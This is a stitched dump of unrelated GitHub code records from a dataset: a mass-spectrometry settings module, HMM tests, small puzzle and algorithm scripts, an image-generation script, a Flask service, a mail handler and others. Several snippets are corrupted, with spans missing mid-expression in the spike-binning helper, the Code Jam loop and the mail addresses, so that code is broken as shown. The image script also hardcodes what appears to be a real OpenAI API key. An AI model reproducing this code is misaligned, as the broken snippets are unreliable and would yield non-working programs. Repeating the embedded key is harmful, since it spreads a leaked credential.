chunking_method_threshold\n chunking_method_threshold = s['chunking_method_threshold']\n \n global max_valid_angle\n max_valid_angle = s['max_valid_angle']\n\n global time_window\n time_window = s['time_window']\n\n global ppm_window\n ppm_window = s['ppm_window']\n\n global label_key\n label_key = s[\"label_key\"]\n \n global aa_labeling_sites_path\n aa_labeling_sites_path = os.path.join(resource_location, s[\"aa_labeling_sites_path\"])\n\n global peak_lookback\n peak_lookback = s['peak_lookback']\n\n global peak_lookahead\n peak_lookahead = s['peak_lookahead']\n\n global baseline_lookback\n baseline_lookback = s['baseline_lookback']\n\n global min_envelopes_to_combine\n min_envelopes_to_combine = s['min_envelopes_to_combine']\n\n global peak_ratio_denominator\n peak_ratio_denominator = s['peak_ratio_denominator']\n\n global zscore_cutoff\n zscore_cutoff = s['zscore_cutoff']\n \n global mz_proximity_tolerance\n mz_proximity_tolerance = s[\"mz_proximity_tolerance\"]\n \n global rt_proximity_tolerance\n rt_proximity_tolerance = s[\"rt_proximity_tolerance\"]\n \n global min_aa_sequence_length\n min_aa_sequence_length = s[\"min_aa_sequence_length\"]\n \n global min_allowed_n_values\n min_allowed_n_values = s[\"min_allowed_n_values\"]\n \n global starting_enrichment_table_timepoints\n starting_enrichment_table_timepoints = s[\"starting_enrichment_table_timepoints\"]\n \n global error_estimation\n error_estimation = s[\"error_estimation\"]\n \n global min_non_zero_timepoints_rate\n min_non_zero_timepoints_rate = s[\"min_non_zero_timepoints_rate\"]\n \n global min_allowed_timepoints_enrichment\n min_allowed_timepoints_enrichment = s[\"min_allowed_timepoints_enrichment\"]\n \n global minimum_allowed_sequence_rate\n minimum_allowed_sequence_rate = s[\"minimum_allowed_sequence_rate\"]\n \n global maximum_allowed_sequence_rate\n maximum_allowed_sequence_rate = s[\"maximum_allowed_sequence_rate\"]\n \n global minimum_sequences_to_combine_for_protein_rate\n minimum_sequences_to_combine_for_protein_rate = s[\"minimum_sequences_to_combine_for_protein_rate\"]\n \n global lowest_allowed_norm_isotope\n lowest_allowed_norm_isotope = s[\"lowest_allowed_norm_isotope\"]\n \n global highest_allowed_norm_isotope\n highest_allowed_norm_isotope = s[\"highest_allowed_norm_isotope\"]\n \n global m0_decreasing_allowed_noise\n m0_decreasing_allowed_noise = s[\"m0_decreasing_allowed_noise\"]\n \n global median_absolute_residuals_cutoff_single_point\n median_absolute_residuals_cutoff_single_point = s[\"median_absolute_residuals_cutoff_single_point\"]\n \n global median_absolute_residuals_cutoff_two_points\n median_absolute_residuals_cutoff_two_points = s[\"median_absolute_residuals_cutoff_two_points\"]\n \n global median_absolute_residuals_cutoff_general\n median_absolute_residuals_cutoff_general = s[\"median_absolute_residuals_cutoff_general\"]\n \n global desired_points_for_optimization_graph\n desired_points_for_optimization_graph = s[\"desired_points_for_optimization_graph\"]\n \n global intensity_filter\n intensity_filter = s[\"intensity_filter\"]\n \n global rel_height\n rel_height = s[\"rel_height\"]\n \n global sampling_rate\n sampling_rate = s[\"sampling_rate\"]\n \n global protein_combination_method\n protein_combination_method = s[\"protein_combination_method\"]\n \n global smoothing_width\n smoothing_width = s[\"smoothing_width\"]\n \n global smoothing_order\n smoothing_order = s[\"smoothing_order\"]\n \n global allowed_peak_variance_min\n allowed_peak_variance_min = s[\"allowed_peak_variance_min\"]\n \n global adduct_weight\n adduct_weight = s[\"adduct_weight\"]\n \n global variance_weight\n variance_weight = s[\"variance_weight\"]\n \n global ID_weight\n ID_weight = s[\"ID_weight\"]\n \n global intensity_weight\n intensity_weight = s[\"intensity_weight\"]\n \n global how_divided\n how_divided = s[\"how_divided\"]\n \n global allowed_neutromer_peak_variance\n allowed_neutromer_peak_variance = s[\"allowed_neutromer_peak_variance\"]\n \n global ms_level\n ms_level = s[\"ms_level\"]\n \n global use_chromatography_division\n use_chromatography_division = s[\"use_chromatography_division\"]\n \n global graph_output_format\n graph_output_format = s[\"graph_output_format\"]\n \n global max_enrichment_allowed\n max_enrichment_allowed = s[\"max_enrichment_allowed\"]\n \n global verbose_output\n verbose_output = s[\"verbose_output\"]\n\n except Exception as e:\n print(e)\n traceback.print_tb(e.__traceback__)\n\n\ndef compare(settings_path, compare_path):\n try:\n settings_path = Path(settings_path)\n with settings_path.open('r') as f:\n setting = yaml.load(f, Loader=yaml.FullLoader)\n compare_path = Path(compare_path)\n with compare_path.open('r') as f:\n compare = yaml.load(f, Loader=yaml.FullLoader)\n if setting.keys() != compare.keys():\n return \"Different Keys\"\n for key in setting.keys():\n if setting[key] != compare[key]:\n return \"Mismatched Keys\"\n return \"MATCH\"\n except:\n return \"Error\"\n\ndef freeze(path=None, settings_dict = None):\n if not settings_dict:\n settings_dict = {\n 'debug_level': debug_level,\n 'recognize_available_cores': recognize_available_cores,\n 'n_processors': n_processors,\n 'id_file_rt_unit': id_file_rt_unit,\n 'trim_ids_to_mzml_bounds': trim_ids_to_mzml_bounds,\n 'chunk_size': chunk_size,\n 'chunking_method_threshold': chunking_method_threshold,\n 'max_valid_angle': max_valid_angle,\n 'time_window': time_window,\n 'ppm_window': ppm_window,\n \"label_key\": label_key,\n \"aa_labeling_sites_path\": aa_labeling_sites_path,\n 'peak_lookback': peak_lookback,\n 'peak_lookahead': peak_lookahead,\n 'baseline_lookback': baseline_lookback,\n 'min_envelopes_to_combine': min_envelopes_to_combine,\n 'peak_ratio_denominator': peak_ratio_denominator,\n 'zscore_cutoff': zscore_cutoff,\n \"max_enrichment_allowed\": max_enrichment_allowed,\n \"min_aa_sequence_length\": min_aa_sequence_length,\n \"mz_proximity_tolerance\":mz_proximity_tolerance,\n \"rt_proximity_tolerance\":rt_proximity_tolerance,\n \"min_allowed_n_values\": min_allowed_n_values,\n \"starting_enrichment_table_timepoints\": starting_enrichment_table_timepoints,\n \"error_estimation\": error_estimation,\n \"min_non_zero_timepoints_rate\": min_non_zero_timepoints_rate,\n \"min_allowed_timepoints_enrichment\": min_allowed_timepoints_enrichment,\n \"minimum_allowed_sequence_rate\": minimum_allowed_sequence_rate,\n \"maximum_allowed_sequence_rate\": maximum_allowed_sequence_rate,\n \"minimum_sequences_to_combine_for_protein_rate\": minimum_sequences_to_combine_for_protein_rate,\n \"lowest_allowed_norm_isotope\": lowest_allowed_norm_isotope,\n \"highest_allowed_norm_isotope\": highest_allowed_norm_isotope,\n \"m0_decreasing_allowed_noise\": m0_decreasing_allowed_noise,\n \"median_absolute_residuals_cutoff_single_point\": median_absolute_residuals_cutoff_single_point,\n \"median_absolute_residuals_cutoff_two_points\": median_absolute_residuals_cutoff_two_points,\n \"median_absolute_residuals_cutoff_general\": median_absolute_residuals_cutoff_general,\n \"desired_points_for_optimization_graph\": desired_points_for_optimization_graph,\n \"intensity_filter\": intensity_filter,\n \"rel_height\": rel_height,\n \"sampling_rate\": sampling_rate,\n \"protein_combination_method\": protein_combination_method,\n \"smoothing_width\": smoothing_width,\n \"smoothing_order\": smoothing_order,\n \"allowed_peak_variance_min\": allowed_peak_variance_min,\n \"adduct_weight\": adduct_weight,\n \"variance_weight\": variance_weight,\n \"ID_weight\": ID_weight,\n \"intensity_weight\": intensity_weight,\n \"how_divided\": how_divided,\n \"allowed_neutromer_peak_variance\": allowed_neutromer_peak_variance,\n \"ms_level\": ms_level,\n \"use_chromatography_division\": use_chromatography_division,\n \"graph_output_format\": graph_output_format,\n \"verbose_output\": verbose_output\n \n }\n if path:\n with open(path, 'w') as frozen_settings_file:\n yaml.dump(\n data=settings_dict,\n stream=frozen_settings_file,\n canonical=False\n )\n else:\n print(yaml.dump(data=settings_dict, canonical=False))\n\n","repo_name":"JC-Price/DeuteRater-H","sub_path":"deuterater/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":12626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34469306512","text":"import numpy as np\nimport unittest\n\nfrom scipy.special import logsumexp\nfrom dsbox.ml.markov.hmmlearn.base import ConvergenceMonitor, _BaseHMM\n\n\nclass TestMonitor(unittest.TestCase):\n def test_converged_by_iterations(self):\n m = ConvergenceMonitor(tol=1e-3, n_iter=2, verbose=False)\n self.assertFalse(m.converged)\n m.report(-0.01)\n self.assertFalse(m.converged)\n m.report(-0.1)\n self.assertTrue(m.converged)\n\n def test_converged_by_logprob(self):\n m = ConvergenceMonitor(tol=1e-3, n_iter=10, verbose=False)\n for logprob in [-0.03, -0.02, -0.01]:\n m.report(logprob)\n self.assertFalse(m.converged)\n\n m.report(-0.0101)\n self.assertTrue(m.converged)\n\n def test_reset(self):\n m = ConvergenceMonitor(tol=1e-3, n_iter=10, verbose=False)\n m.iter = 1\n m.history.append(-0.01)\n m._reset()\n self.assertEqual(m.iter, 0)\n self.assertFalse(m.history)\n\n\nclass StubHMM(_BaseHMM):\n \"\"\"An HMM with hardcoded observation probabilities.\"\"\"\n\n def _compute_log_likelihood(self, X):\n return self.framelogprob\n\n\nclass TestBaseAgainstWikipedia(unittest.TestCase):\n def setup_method(self):\n # Example from http://en.wikipedia.org/wiki/Forward-backward_algorithm\n self.framelogprob = np.log([[0.9, 0.2],\n [0.9, 0.2],\n [0.1, 0.8],\n [0.9, 0.2],\n [0.9, 0.2]])\n\n h = StubHMM(2)\n h.transmat_ = [[0.7, 0.3], [0.3, 0.7]]\n h.startprob_ = [0.5, 0.5]\n h.framelogprob = self.framelogprob\n self.hmm = h\n\n def test_do_forward_pass(self):\n self.setup_method()\n logprob, fwdlattice = self.hmm._do_forward_pass(self.framelogprob)\n\n reflogprob = -3.3725\n self.assertEqual(np.round(logprob, 4), reflogprob)\n reffwdlattice = np.array([[0.4500, 0.1000],\n [0.3105, 0.0410],\n [0.0230, 0.0975],\n [0.0408, 0.0150],\n [0.0298, 0.0046]])\n self.assertTrue(np.allclose(np.exp(fwdlattice), reffwdlattice, 4))\n\n def test_do_backward_pass(self):\n self.setup_method()\n bwdlattice = self.hmm._do_backward_pass(self.framelogprob)\n\n refbwdlattice = np.array([[0.0661, 0.0455],\n [0.0906, 0.1503],\n [0.4593, 0.2437],\n [0.6900, 0.4100],\n [1.0000, 1.0000]])\n self.assertTrue(np.allclose(np.exp(bwdlattice), refbwdlattice, 4))\n\n def test_do_viterbi_pass(self):\n self.setup_method()\n logprob, state_sequence = self.hmm._do_viterbi_pass(self.framelogprob)\n\n refstate_sequence = [0, 0, 1, 0, 0]\n self.assertTrue(np.allclose(state_sequence, refstate_sequence))\n\n reflogprob = -4.4590\n self.assertEqual(np.round(logprob, 4), reflogprob)\n\n def test_score_samples(self):\n self.setup_method()\n # ``StubHMM` ignores the values in ```X``, so we just pass in an\n # array of the appropriate shape.\n logprob, posteriors = self.hmm.score_samples(self.framelogprob)\n self.assertTrue(np.allclose(posteriors.sum(axis=1), np.ones(len(posteriors))))\n\n reflogprob = -3.3725\n self.assertEqual(np.round(logprob, 4), reflogprob)\n\n refposteriors = np.array([[0.8673, 0.1327],\n [0.8204, 0.1796],\n [0.3075, 0.6925],\n [0.8204, 0.1796],\n [0.8673, 0.1327]])\n self.assertTrue(np.allclose(posteriors, refposteriors, atol=1e-4))\n\n\nclass TestBaseConsistentWithGMM(unittest.TestCase):\n def setup_method(self):\n self.n_components = 8\n n_samples = 10\n\n self.framelogprob = np.log(np.random.random((n_samples, self.n_components)))\n\n h = StubHMM(self.n_components)\n h.framelogprob = self.framelogprob\n\n # If startprob and transmat are uniform across all states (the\n # default), the transitions are uninformative - the model\n # reduces to a GMM with uniform mixing weights (in terms of\n # posteriors, not likelihoods).\n h.startprob_ = np.ones(self.n_components) / self.n_components\n h.transmat_ = np.ones((self.n_components, self.n_components)) / self.n_components\n\n self.hmm = h\n\n def test_score_samples(self):\n self.setup_method()\n logprob, hmmposteriors = self.hmm.score_samples(self.framelogprob)\n\n n_samples, n_components = self.framelogprob.shape\n self.assertTrue(np.allclose(hmmposteriors.sum(axis=1), np.ones(n_samples)))\n\n norm = logsumexp(self.framelogprob, axis=1)[:, np.newaxis]\n gmmposteriors = np.exp(self.framelogprob - np.tile(norm, (1, self.n_components)))\n self.assertTrue(np.allclose(hmmposteriors, gmmposteriors))\n\n def test_decode(self):\n self.setup_method()\n _logprob, state_sequence = self.hmm.decode(self.framelogprob)\n\n n_samples, n_components = self.framelogprob.shape\n norm = logsumexp(self.framelogprob, axis=1)[:, np.newaxis]\n gmmposteriors = np.exp(self.framelogprob -\n np.tile(norm, (1, n_components)))\n gmmstate_sequence = gmmposteriors.argmax(axis=1)\n self.assertTrue(np.allclose(state_sequence, gmmstate_sequence))\n\n\nclass TestHMMAttributes(unittest.TestCase):\n def test_base_hmm_attributes(self):\n n_components = 20\n startprob = np.random.random(n_components)\n startprob /= startprob.sum()\n transmat = np.random.random((n_components, n_components))\n transmat /= np.tile(transmat.sum(axis=1)[:, np.newaxis], (1, n_components))\n\n h = StubHMM(n_components)\n\n self.assertEqual(h.n_components, n_components)\n\n h.startprob_ = startprob\n self.assertTrue(np.allclose(h.startprob_, startprob))\n\n with self.assertRaises(ValueError):\n h.startprob_ = 2 * startprob\n h._check()\n with self.assertRaises(ValueError):\n h.startprob_ = []\n h._check()\n with self.assertRaises(ValueError):\n h.startprob_ = np.zeros((n_components - 2, 2))\n h._check()\n\n h.startprob_ = startprob\n h.transmat_ = transmat\n self.assertTrue(np.allclose(h.transmat_, transmat))\n with self.assertRaises(ValueError):\n h.transmat_ = 2 * transmat\n h._check()\n with self.assertRaises(ValueError):\n h.transmat_ = []\n h._check()\n with self.assertRaises(ValueError):\n h.transmat_ = np.zeros((n_components - 2, n_components))\n h._check()\n\n\nclass TestStationaryDistribution(unittest.TestCase):\n def test_stationary_distribution(self):\n n_components = 10\n h = StubHMM(n_components)\n transmat = np.random.random((n_components, n_components))\n transmat /= np.tile(transmat.sum(axis=1)[:, np.newaxis], (1, n_components))\n h.transmat_ = transmat\n stationary = h.get_stationary_distribution()\n self.assertEqual(stationary.dtype, float)\n self.assertListEqual(list(np.round(np.dot(h.get_stationary_distribution().T, h.transmat_), 5)),\n list(np.round(stationary, 5)))\n","repo_name":"vlevorato/dsbox","sub_path":"tests/ml/markov/hmmlearn/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7534,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"71377243395","text":"in_min=136818\nin_max=685979\n\ndef includes_duplicates(num):\n\tstr_num = str(num)\n\tfor n in range(len(str_num) - 1):\n\t\tif str_num[n] == str_num[n + 1]:\n\t\t\treturn True\n\treturn False\n\ndef monotonic_increase(num):\n\tstr_num = str(num)\n\tfor n in range(len(str_num) - 1):\n\t\tif str_num[n + 1] < str_num[n]:\n\t\t\treturn False\n\treturn True\n\ndef includes_exactly_a_pair(num):\n\tstr_num = str(num)\n\tdigits = []\n\tfor i in range(10):\n\t\ttmp = str_num.count(str(i))\n\t\tif tmp > 1:\n\t\t\tdigits.append(tmp)\n\tfor i in range(len(digits)):\n\t\tif digits[i] == 2:\n\t\t\treturn True\n\treturn False\n\n#print(len(filter(includes_duplicates, filter(monotonic_increase, range(in_min, in_max)))))\nprint(len(filter(includes_exactly_a_pair,filter(monotonic_increase, range(in_min, in_max)))))","repo_name":"IratePirates/AoC2019","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30082153291","text":"'''find all the prime number till N'''\r\nimport math\r\nn=30\r\narr=[1]*(n+1)\r\ni=2\r\nwhile i*i<=n:\r\n\tif arr[i]==1:\r\n\t\tfor j in range((i*i),n+1,i):\r\n\t\t\tarr[j]=0\r\n\ti+=1\r\ncount=0\r\nfor i in arr:\r\n\tif i==1:\r\n\t\tcount+=1\r\nprint(arr)\r\nprint(\"Numbers of prime number in range\",n,\"is\",count)","repo_name":"zvut/CODING-PRACTICE","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73316442433","text":"number=int(input('Enter the range for fibonacci series: '))\n\ndef fibo(n):\n a,b=0,1\n\n if n<0 and n==0:\n print('Error, Give the correct length')\n elif n==1:\n print(a)\n elif n==2:\n print(a,b)\n else:\n print(a,b,end=' ')\n sum=0\n for i in range(n-2):\n sum=a+b\n print(sum,end=' ')\n a=b\n b=sum\n\nfibo(number)","repo_name":"Gorish25/Collection-of-Python-Programs","sub_path":"23fibonacci.py","file_name":"23fibonacci.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74822296835","text":"import openai\nimport csv\nimport requests\n\n\nwords = []\ndefinitions = []\nsynonyms = []\nstems = []\n\n# with open('Synonyme.csv', \"r\") as csvfile:\n# reader = csv.reader(csvfile)\n# for row in reader:\n# if len(row) >= 2:\n# synonyms.append(row[0])\n\ncolumn_index = 1\nwith open('Synonyme.csv', \"r\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if len(row) >= 2:\n value = row[1].strip()\n synonyms.append(value)\n else:\n synonyms.append(\"\")\n\n\nwith open('Definition.csv', \"r\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if len(row) >= 2:\n words.append(row[0])\n definitions.append(row[1])\n\n\nopenai.api_key = \"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\"\n\ntemp_words = words[1:]\ntemp_def = definitions[1:]\ntemp_synonyms = synonyms[1:]\n\n# print(len(temp_words)) # 3597\n# print(len(temp_def))\n# print(len(temp_synonyms))\n\nfor i in range(3597):\n stems.append(\"Image of \" + temp_words[i] + \" (Style: realism, no text, white background; \" +\n temp_words[i] + \" definition: \" + temp_def[i] + \"; \" + temp_words[i] +\n \" synonyms: \" + temp_synonyms[i])\n\n\n# print(stems[8])\n\n# prompt_stem = \\\n# \"Image of [WORD1] (Style: realistic, no text, white background;\" \\\n# \"[WORD1] definition: x; [WORD1] synonyms: [y, z])\"\n\ntemp_stems = stems[:5]\ncounter = 1\nnum_photo = 2\nexception = []\n\nfor prompt in temp_stems:\n try:\n response = openai.Image.create(\n prompt=prompt,\n n=num_photo, # number of images\n size=\"512x512\" # 256x256, 512x512, 1024x1024 (default)\n )\n for i in range(num_photo):\n image_url = response['data'][i]['url']\n image_data = requests.get(image_url).content\n image_name = \"./Images/\" + str(counter) + \"-\" + str(i+1) + \".jpg\"\n with open(image_name, \"wb\") as f:\n f.write(image_data)\n print(image_name + \" generated\")\n counter += 1\n except Exception as e:\n print(f\"Error with prompt '{prompt}': {e}\")\n exception.append([prompt, e])\n continue\n\n\nwith open('Exception.csv', mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(exception)\n # image_url = response['data'][0]['url']\n # image_data = requests.get(image_url).content\n # with open(\"./Images/\" + str(counter) + \".jpg\", \"wb\") as f:\n # f.write(image_data)","repo_name":"bobaba99/AIimage","sub_path":"imagegen.py","file_name":"imagegen.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18482351305","text":"from db import db\nfrom utils.util import uid\nfrom models.profile_model import ProfileModel\nfrom models.branch_model import BranchModel\nfrom models.address_model import AddressModel\nfrom models.img_model import ImgModel\n\nfrom mappers.profile_mapper import ProfileMapper\nfrom mappers.img_mapper import ImgMapper\nfrom mappers.branch_mapper import BranchMapper\nfrom mappers.address_mapper import AddressMapper\nimport datetime\n\nclass ProfileService:\n\n session_info = None\n\n def mapping(self, model, view):\n print(self.session_info)\n if view.get('id', None) is not None:\n model = ProfileModel.query.filter_by(id=view.get('id')).first()\n if model is None:\n model = ProfileModel()\n model.id = uid()\n # model.branchId = view['branch']['id']\n model.address = AddressModel()\n model.address.id = model.id\n model.address.vid = self.session_info['vid']\n model.img = ImgModel()\n model.img.id = model.id\n\n model.vid = self.session_info['vid']\n model.createdBy = self.session_info['id']\n model.updatedBy = self.session_info['id']\n model.updatedOn = datetime.datetime.now()\n model.createdOn = datetime.datetime.now()\n\n ProfileMapper(model, view).model_mapping()\n AddressMapper(model.address, view.get('address', None)).model_mapping()\n ImgMapper(model.img, view.get('img', None)).model_mapping()\n return model\n\n def save(self, req_data):\n profile = self.mapping(None, req_data)\n db.session.add(profile)\n db.session.commit()\n return {'message': 'Saved Successfully', 'id': profile.id}\n\n\n def search(self):\n print(\"branch service\")\n data_list = ProfileModel.query.all()\n print(data_list[0].__dict__)\n return data_list\n","repo_name":"prasadsrg/python_rest","sub_path":"src/services/profile_service.py","file_name":"profile_service.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41163532848","text":"#!/usr/bin/env python\n# coding: utf-8\n\nevents = {}\n\ndef add(event, func, sync_flag = \"sync\"):\n # sync_flag have 'sync', 'async' values for now\n if event not in events:\n events[event] = {}\n if sync_flag not in events[event]:\n events[event][sync_flag] = []\n events[event][sync_flag].append(func)\n\ndef delete(event):\n if event in events:\n del events[event]\n \ndef delete_all():\n all_events = list_all()\n if (all_events != 'None'):\n for event in all_events:\n delete(event)\n \ndef list_all():\n if len(events) == 0:\n return ['None']\n else:\n return list(events.keys())\n\nasync def async_trigger(event, data): \n sync_flag = \"async\"\n if (len(events) != 0):\n for event in list(events.keys()):\n if sync_flag in events.get(event):\n for func in events.get(event).get(sync_flag):\n await func(data)\n\ndef trigger(event, data): \n sync_flag = \"sync\"\n if (len(events) != 0):\n for event in list(events.keys()):\n if sync_flag in events[event]:\n for func in events[event][sync_flag]:\n func(data)\n","repo_name":"makristi/python_folderwatcher","sub_path":"EventManager.py","file_name":"EventManager.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74229999555","text":"def rabin_karp(pattern, string):\n n = len(string)\n m = len(pattern)\n \n if m > n:\n return False\n \n def encode(char):\n return ord(char) - ord('a')\n \n BASE = 26 # a-z\n MOD = 10**9+7\n \n def get_hash(substr):\n value = 0\n for char in substr:\n value = (value*BASE + encode(char)) % MOD\n return value\n \n pattern_hash = get_hash(pattern)\n target_hash = get_hash(string[:m])\n \n for start in range(-1, n - m):\n end = start + m\n if start > -1:\n target_hash = (target_hash - encode(string[start])*BASE**(m-1)) % MOD \n target_hash = (target_hash*BASE + encode(string[end])) % MOD\n if target_hash == pattern_hash and string[start+1:end+1] == pattern:\n return True\n return False\n\nprint(rabin_karp('abc', 'cacadhsdabc'))\n","repo_name":"leonfoliveira/python-algorithms-and-ds","sub_path":"rabin-karp.py","file_name":"rabin-karp.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17472762156","text":"import time\r\n\r\ndef fib(nr):\r\n\ta = 0\r\n\tb = 1\r\n\twhile nr > 0:\r\n\t\tb = a + b\r\n\t\ta = b - a\r\n\t\tnr = nr-1\r\n\r\n\tprint(a)\r\n\t\r\ndef fib_even_or_odd(nr):\r\n\tif nr%3 == 0:\r\n\t\tprint(\"gerade\")\r\n\telse:\r\n\t\tprint(\"ungerade\")\r\n\t\r\n\t\r\n\t\r\n\t\r\nprint(\"ex: (nr,fib_nr), (0,0), (1,1), (2,1), (3,2), (4,3), (5,5), (6,8)\")\t\r\nnr = int(input(\"nr? \"))\r\n\r\nfib_even_or_odd(nr)\r\nfib(nr)\r\n\r\ntime.sleep(10)","repo_name":"simonandreashuber/fibonacci-numbers","sub_path":"fibonacci_numbers/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10443353560","text":"import os\nimport sys\nimport numpy as np\nimport re\n\ndef get_binned_spikes(spks,bin_size=10):\n \"\"\" Takes in spike times of units and returns binned spike\n rates (no smoothing) at specified resolution. Bin size\n is in ms\n \"\"\"\n\n #30 because sampling rate of the ephys is \n maxT = (np.nanmax([np.nanmax(i) for i in spks])/30.)/bin_size\n\n spk_arr = np.zeros([len(spks),int(np.ceil(maxT))])\n for i,u in enumerate(spks):\n spk_arr[i,np.floor(u/30/bin_size).astype(\"int\")[:,0]] = 1\n \n return spk_arr\n\ndef get_port_to_state_map(dat_dict,task_times):\n task1 = []\n task2 = []\n for dp,ds in zip(dat_dict['port'],dat_dict['state']):\n \n if np.any([np.logical_and((dp[2]*1000)>t_[0],(dp[2]*1000)0]\n next_handle_poke = np.min(tmp) +lot\n \n lights_off_DM[int(np.floor(lot/bin_size)):int(np.floor((next_handle_poke)/bin_size))] = 1\n \n return lights_off_DM\n\ndef build_state_DM(port_DM,task_DM,task1_map,task2_map):\n \n task1p = [i[0] for i in task1]\n task1s = [i[1] for i in task1]; task1s = np.array(task1s) - np.min(task1s)\n \n task2p = [i[0] for i in task2]\n task2s = [i[1] for i in task2]; task2s = np.array(task2s) - np.min(task2s)\n \n state_DM_task1 = np.zeros([port_DM.shape[0]+1,port_DM.shape[1]])\n state_DM_task2 = np.zeros([port_DM.shape[0]+1,port_DM.shape[1]])\n\n for t_,col in enumerate(port_DM.T):\n if np.sum(col):\n tmp2 = [int(i) for i in np.where(col)[0]] #which port poked. Loop because sometime 2 ports poked in small window (i.e. one from paw and one snout)\n for tmp in tmp2:\n if tmp in task1p:\n state_DM_task1[task1s[task1p.index(tmp)],t_] = 1\n else:\n state_DM_task1[-1,t_] = 1\n\n if tmp in task2p:\n state_DM_task2[task2s[task2p.index(tmp)],t_] = 1\n else:\n state_DM_task2[-1,t_] = 1\n return state_DM_task1,state_DM_task2 \n\ndef get_port_to_state_map(dat_dict,task_times):\n \n task1 = []\n task2 = []\n for dp,ds in zip(dat_dict['port'],dat_dict['state']):\n \n if np.any([np.logical_and((dp[2]*1000)>t_[0],(dp[2]*1000)\",\n to=\"Mona \",\n subject=\"You have {0} new contact(s)\".format(count),\n body=message\n )\n\n self.response.write(message)\n logger.info(\n 'Send daily mail success, {0} new contacts'.format(count))\n\n put_list = []\n for contact in contacts:\n contact.sent = True\n put_list.append(contact)\n\n ndb.put_multi(put_list)\n\n\nclass MailContactHandler(BaseHandler):\n def get(self):\n send_contact_mail(self)\n\n\nclass MailAllHandler(BaseHandler):\n def get(self):\n contacts = Contact.query()\n datetime_handler = lambda obj: obj.isoformat() \\\n if isinstance(obj, datetime) else None\n self.render_json(\n [contact.to_dict() for contact in contacts],\n default=datetime_handler,\n )\n logger.info('Check all {} contact(s)'.format(contacts.count()))\n\n\n# lint_ignore=E712\n","repo_name":"7kfpun/com.getmewrite","sub_path":"handlers/mails.py","file_name":"mails.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70599171076","text":"import calisan\n\nclass BeyazYaka(calisan.Calisan):\n def __init__(self,ad, soyad, tc_no, yas, cinsiyet, uyruk, sektor, tecrube, maas):\n super().__init__(ad, soyad, tc_no, yas, cinsiyet, uyruk, sektor, tecrube, maas)\n self.__tesvikprim=int()\n\n def get_prim(self):\n return self.__tesvikprim\n def set_prim(self,prim):\n self.__tesvikprim=prim\n def zam_hakki(self):\n tecrube = self.getyiltecrube()\n if tecrube < 2:\n self.__yenimaas = int(self.get_maas()) + self.__tesvikprim\n elif tecrube >= 2 and tecrube < 4:\n if self.get_maas() < 15000:\n zam_miktari = ((self.get_maas() % self.get_tecrube()) * 5) + self.__tesvikprim\n self.__yenimaas = int(self.get_maas()) + int(zam_miktari)\n else:\n self.__yenimaas=self.get_maas()\n else:\n if self.get_maas() < 25000:\n zam_miktari = (((self.get_maas() % self.get_tecrube())) * 5) + self.__tesvikprim\n self.__yenimaas = int(self.get_maas()) + int(zam_miktari)\n else:\n self.__yenimaas=self.get_maas()\n\n def get_yenimaas(self):\n self.zam_hakki()\n return int(self.__yenimaas)\n def __str__(self):\n maasbilgisi = self.get_yenimaas()\n text = \"İsim:\" + self.get_ad() + \"\\n\"+\"Soyisim:\" + self.get_soyad() + \"\\n\"+\"Tecrübe (yıl) :\" + str(self.getyiltecrube()) + \"\\n\"+\"Maas:\" + str(maasbilgisi)\n return text","repo_name":"muratkavak/bil104_proje2","sub_path":"beyazyaka.py","file_name":"beyazyaka.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23436102101","text":"\r\n\r\ndef entre():\r\n\tn=int(raw_input())\r\n\tinpute=[[] for i in range(n)]\r\n\toutpute=[[] for i in range(n)]\r\n\tfor j in range(n):\r\n\t\tnb=int(raw_input())\r\n\t\ts=raw_input()\r\n\t\ts=s.split()\r\n\t\tna=[float(i) for i in s]\r\n\t\tss=raw_input()\r\n\t\tss=ss.split()\r\n\t\tnaa=[float(i) for i in ss]\r\n\t\tinpute[j]=[nb,na,naa]\r\n\treturn inpute,outpute\r\n\r\nE,S=entre()\r\n\r\nnb=0\r\nfor T in E:\r\n\tnb+=1\r\n\tr=0\r\n\tl=T[0]\r\n\tT[1].sort()\r\n\tT[2].sort()\r\n\tj=0\r\n\ti=0\r\n\tri=0\r\n\tf=l\r\n\twhile iT[2][i]:\r\n\t\t\trj+=1\r\n\t\telse:\r\n\t\t\ti+=1\r\n\tprint(\"Case #\"+str(nb)+\": \"+str(ri)+\" \"+str(rj))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/788.py","file_name":"788.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 